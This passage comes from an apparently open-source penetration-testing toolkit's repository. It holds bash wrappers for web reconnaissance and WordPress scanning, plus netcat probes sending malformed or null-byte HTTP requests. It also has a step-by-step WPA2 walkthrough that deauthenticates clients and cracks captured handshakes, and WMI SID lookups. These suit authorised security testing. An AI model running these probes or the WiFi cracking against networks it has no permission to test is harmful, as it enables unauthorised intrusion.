22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	wget "http://$1/robots.txt"
27 | else
28 |     echo "Please provide target host."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/screenshot.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	python2 /opt/EyeWitness/EyeWitness.py --web -f $1
27 | else
28 |     echo "Please provide a file containing target urls."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/web-app-framework.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	whatweb -v -a 3 -U='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36' --log-verbose=whatweb_results.txt $1
27 | else
28 |     echo "Please provide target url."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/web-headers-malformed-2.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	echo -e 'GET / JUNK/1.0\r\n\r\n' | nc $1 $2
27 | else
28 |     echo "Please provide the target IP and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/web-headers-malformed.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	echo -e 'GET / HTTP/3.0\r\n\r\n' | nc $1 $2
27 | else
28 |     echo "Please provide the target IP and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/web-headers-null.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	echo -e 'GET /%00\r\n\r\n' | nc $1 $2
27 | else
28 |     echo "Please provide the target IP and port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/web-recon.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 3 ]; then
26 | 	whatweb --color=never --no-errors -a 3 -v $1://$2:$3 2>&1 | tee "$1_$2_$3_whatweb.txt"
27 | else
28 |     echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port."
29 | fi
30 | 


--------------------------------------------------------------------------------
/web/wordpress-scan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 1 ]; then
26 | 	LOGNAME="wpscan_$1"
27 |   	LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g')
28 |   	LOGNAME="$LOGNAME.txt"
29 | 	wpscan -v --url $1 --update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee $LOGNAME
30 | else
31 |     echo "Please provide the URL."
32 | fi
33 | 


--------------------------------------------------------------------------------
/wifi/wifi.md:
--------------------------------------------------------------------------------
 1 | ## WiFi Notes
 2 | 
 3 | ### Debian
 4 | 
 5 | * Add a "non-free" component to /etc/apt/sources.list
 6 | 
 7 | ```bash
 8 | sudo apt-get install firmware-atheros
 9 | ```
10 | 
11 | [ath9k_htc](https://wiki.debian.org/ath9k_htc)
12 | 


--------------------------------------------------------------------------------
/wifi/wpa2.md:
--------------------------------------------------------------------------------
 1 | ## WPA2 WiFi Hacking
 2 | 
 3 | ### Enable monitor mode on wireless interface 
 4 | 
 5 | **List wireless interfaces supporting monitor mode**
 6 | 
 7 | ```bash
 8 | airmon-ng
 9 | ```
10 | 
11 | **Enable monitor mode**
12 | 
13 | ```bash
14 | airmon-ng start wlan0
15 | ```
16 | 
17 | ### Scan for WiFi networks
18 | 
19 | ```bash
20 | airodump-ng wlan0mon
21 | ```
22 | 
23 | ### Packet Capture
24 | 
25 | ```bash
26 | airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon
27 | ```
28 | 
29 | ### Inject packets/Capture Handshake
30 | 
31 | ```bash
32 | aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon
33 | ```
34 | 
35 | ### Cracking
36 | 
37 | ```bash
38 | aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap
39 | ```
40 | 
41 | 


--------------------------------------------------------------------------------
/windows/wmi.md:
--------------------------------------------------------------------------------
 1 | ## Windows Management Instrumentation
 2 | 
 3 | ### Get SID of a local user
 4 | 
 5 | ```
 6 | wmic useraccount where name='username' get sid
 7 | ```
 8 | 
 9 | 
10 | ### Get SID for current logged in user
11 | 
12 | ```
13 | wmic useraccount where name='%username%' get sid
14 | ```
15 | 
16 | ### Get SID for current logged in domain user
17 | 
18 | ```
19 | whoami /user
20 | ```
21 | 
22 | ### Get SID for the local administrator of the computer
23 | 
24 | ```
25 | wmic useraccount where (name='administrator' and domain='%computername%') get name,sid
26 | ```
27 | 
28 | ### Get SID for the domain administrator
29 | 
30 | ```
31 | wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
32 | ```
33 | 
34 | ### Find username from a SID
35 | 
36 | ```
37 | wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name
38 | ```
39 | 
40 | 


--------------------------------------------------------------------------------